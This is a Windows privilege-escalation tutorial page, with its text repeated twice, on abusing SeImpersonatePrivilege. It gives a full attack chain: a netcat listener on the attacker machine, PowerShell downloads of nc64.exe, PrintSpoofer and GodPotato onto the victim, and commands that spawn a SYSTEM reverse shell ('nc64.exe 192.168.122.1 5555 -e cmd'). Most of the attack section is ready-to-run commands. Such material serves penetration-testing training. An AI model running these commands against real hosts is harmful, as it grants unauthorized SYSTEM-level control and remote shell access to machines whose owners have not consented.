4 - SeImpersonatePrivilege Exploitation

Topics

Introduction to the Windows Shells
Windows Permissions
Reverse Shells in Windows
SeImpersonatePrivilege Exploitation
On Cross Compilation
Windows Services
Weak Service Permissions
Unquoted Service Path
DLL Hijacking
Always Install Elevated
Files with Sensitive Data
Windows Hashes
Stored Credentials and the Windows Vault
Scheduled Task
Critical Registry Paths
Useful Tools
AMSI Bypass

The SeImpersonatePrivilege, or "Impersonate a client after authentication," is a user right in Windows that allows programs running on behalf of a user to impersonate another client.

This privilege is primarily used in client-server scenarios, enabling a server process to impersonate the client process to perform tasks on its behalf.

Security Implications

If an attacker has the SeImpersonatePrivilege, they can:

Create a service to trick clients into connecting to it.
Impersonate the connected client’s privileges, potentially escalating their own access to SYSTEM. This makes SeImpersonatePrivilege a common target in privilege escalation attacks.

Checking for SeImpersonatePrivilege

To verify whether the current user has this privilege, run the following:

whoami /priv

Sample Output

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeImpersonatePrivilege        Impersonate a client after authentication Enabled

If the SeImpersonatePrivilege is enabled, the user can exploit it for privilege escalation using tools like PrintSpoofer or GodPotato.

Assigning SeImpersonatePrivilege

If you want to assign the SeImpersonatePrivilege to a user:

Open the Local Group Policy Editor:
- Navigate to: Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment.
- Locate "Impersonate a client after authentication."
Right-click and select Properties, then click Add User or Group.

Privilege Escalation with SeImpersonatePrivilege

Initial Setup

Start a Listener on the Attacker Machine
```
nc -lvnp 5555
```

Download Netcat on the Victim Machine

iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -Outfile nc64.exe

Exploiting with PrintSpoofer

PrintSpoofer leverages misconfigured print spooler services to escalate privileges to SYSTEM.

Download the Exploit

iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -Outfile PrintSpoofer64.exe

Execute the Exploit Run the following command to establish a SYSTEM shell:

PrintSpoofer64.exe -c "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"

Exploiting with GodPotato

GodPotato is a tool that exploits COM and DCOM misconfigurations to achieve SYSTEM privileges.

Identify .NET Framework Version Use the following command to determine the .NET version installed:
```
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
```

Download the Appropriate GodPotato Version Depending on the .NET version:

.NET 2.0:

iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -Outfile GodPotato-NET2.exe

.NET 3.5:

iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe" -Outfile GodPotato-NET35.exe

.NET 4.0:

iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe" -Outfile GodPotato-NET4.exe

Execute the Exploit Use the appropriate executable to escalate privileges and spawn a reverse shell:
```
.\GodPotato-NET2.exe -cmd "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
```

Other Resources

Disclaimer

❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!❗

Previous3 - Reverse Shells in Windows Next5 - On Cross Compilation

Last updated 5 months ago

4 - SeImpersonatePrivilege Exploitation

Topics

Introduction to the Windows Shells
Windows Permissions
Reverse Shells in Windows
SeImpersonatePrivilege Exploitation
On Cross Compilation
Windows Services
Weak Service Permissions
Unquoted Service Path
DLL Hijacking
Always Install Elevated
Files with Sensitive Data
Windows Hashes
Stored Credentials and the Windows Vault
Scheduled Task
Critical Registry Paths
Useful Tools
AMSI Bypass

What is ?

The SeImpersonatePrivilege, or "Impersonate a client after authentication," is a user right in Windows that allows programs running on behalf of a user to impersonate another client.

This privilege is primarily used in client-server scenarios, enabling a server process to impersonate the client process to perform tasks on its behalf.

Security Implications

If an attacker has the SeImpersonatePrivilege, they can:

Create a service to trick clients into connecting to it.
Impersonate the connected client’s privileges, potentially escalating their own access to SYSTEM. This makes SeImpersonatePrivilege a common target in privilege escalation attacks.

Checking for SeImpersonatePrivilege

To verify whether the current user has this privilege, run the following:

whoami /priv

Sample Output

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeImpersonatePrivilege        Impersonate a client after authentication Enabled

If the SeImpersonatePrivilege is enabled, the user can exploit it for privilege escalation using tools like PrintSpoofer or GodPotato.

Assigning SeImpersonatePrivilege

If you want to assign the SeImpersonatePrivilege to a user:

Open the Local Group Policy Editor:
- Navigate to: Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment.
- Locate "Impersonate a client after authentication."
Right-click and select Properties, then click Add User or Group.

Privilege Escalation with SeImpersonatePrivilege

Initial Setup

Start a Listener on the Attacker Machine
```
nc -lvnp 5555
```

Download Netcat on the Victim Machine

iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -Outfile nc64.exe

Exploiting with PrintSpoofer

PrintSpoofer leverages misconfigured print spooler services to escalate privileges to SYSTEM.

Download the Exploit

iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -Outfile PrintSpoofer64.exe

Execute the Exploit Run the following command to establish a SYSTEM shell:

PrintSpoofer64.exe -c "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"

Exploiting with GodPotato

GodPotato is a tool that exploits COM and DCOM misconfigurations to achieve SYSTEM privileges.

Identify .NET Framework Version Use the following command to determine the .NET version installed:
```
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
```

Download the Appropriate GodPotato Version Depending on the .NET version:

.NET 2.0:

iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -Outfile GodPotato-NET2.exe

.NET 3.5:

iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe" -Outfile GodPotato-NET35.exe

.NET 4.0:

iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe" -Outfile GodPotato-NET4.exe

Execute the Exploit Use the appropriate executable to escalate privileges and spawn a reverse shell:
```
.\GodPotato-NET2.exe -cmd "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
```

Other Resources

Disclaimer

❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!❗

Previous3 - Reverse Shells in Windows Next5 - On Cross Compilation

Last updated 5 months ago